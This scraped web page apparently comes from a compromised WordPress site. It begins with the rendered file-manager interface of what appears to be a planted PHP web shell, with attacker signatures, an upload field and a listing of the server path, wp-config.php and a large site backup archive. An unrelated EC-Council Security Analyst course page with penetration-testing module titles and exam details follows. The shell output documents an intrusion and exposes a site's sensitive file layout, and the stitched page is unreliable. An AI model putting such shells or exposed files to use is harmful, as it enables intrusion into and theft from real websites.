-=[ Mr. Bumblebee ]=-
_Indonesia_

Path : /home/u296938431/domains/groundcyber.com/public_html/
File Upload :

Name
Size
Permission
Modify
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
1.46 KB
-rw-r--r--
.htaccess.bk
0.697 KB
-rw-r--r--
.htaccess_original
1.066 KB
-rw-r--r--
error_log
126.397 KB
-rw-r--r--
groundcyber.zip
251.64 MB
-rw-r--r--
index.php
0.396 KB
-rw-r--r--
license.txt
19.448 KB
-rw-r--r--
readme.html
7.107 KB
-rw-r--r--
test.php
0 KB
-rw-r--r--
wp-activate.php
6.935 KB
-rw-r--r--
wp-blog-header.php
0.343 KB
-rw-r--r--
wp-comments-post.php
2.273 KB
-rw-r--r--
wp-config-sample.php
2.845 KB
-rw-r--r--
wp-config.php
2.768 KB
-rw-r--r--
wp-cron.php
3.847 KB
-rw-r--r--
wp-links-opml.php
2.438 KB
-rw-r--r--
wp-load.php
3.223 KB
-rw-r--r--
wp-login.php
48.663 KB
-rw-r--r--
wp-mail.php
8.31 KB
-rw-r--r--
wp-settings.php
20.483 KB
-rw-r--r--
wp-signup.php
30.603 KB
-rw-r--r--
wp-trackback.php
4.636 KB
-rw-r--r--
xmlrpc.php
3.16 KB
-rw-r--r--

Copyright © 2017 || Recoded By Mr.Bumblebee

root home up
Uploder By Ynzu1337

 Yukiteru404 Was Here

" Heh.. Just For Fun ! "

-

Akira.AR

-

./Exit

Security Analyst Certification Course | EC-Council |

Security Analyst | Certification Course | EC-Council

  • Home
  • Security Analyst | Certification Course | EC-Council
Security Analyst | Certification Course | EC-Council

Course Description

Cloud security breaches consistently make news headlines. Yet, the stories of these breaches are often framed with vague explanations — a “misconfigured database” or mismanagement by an unnamed “third party.”

The ambiguity that surrounds cloud computing can make securing the enterprise seem daunting. Concerns about security have led some CIOs to limit their organizational use of public cloud services.

However, the challenge exists not in the security of the cloud itself, but in the technologies for security and control of the technology. In nearly all cases, it is the user, not the cloud provider, who fails to manage the controls used to protect an organization’s data.

Training Modules

Module 00: Penetration Testing(Self-Study)
Module 01: Introduction of Penetration Testing and Methodologies
Module 02: Penetration Testing Scoping and Methodology
Module 03: Open-Source Intelligence (OSINT) Methodology concept
Module 04: Social Engineering of Penetration Testing Methodology
Module 05: Network Penetration Testing – External
Module 06: Network Penetration Testing – Internal
Module 07: Network Penetration Testing – Perimeter Devices
Module 08: Web Application Penetration Testing
Module 09: Database Penetration Testing
Module 10: Wireless Penetration Testing
Module 11: Cloud Penetration Testing
Module 12: Report Writing and Post Testing

image

About the Exam and Certification

Certified Security Analyst (Theory)

Credit Towards Certification: ECSA v10
Number of Questions: 150
Passing score: 70%
Test Duration: 4 Hours

some guidance allows to:

  • Better requirement analysis
  • More sophisticated architectural planning
  • More flexible risk acceptance processes
error: Content is protected !!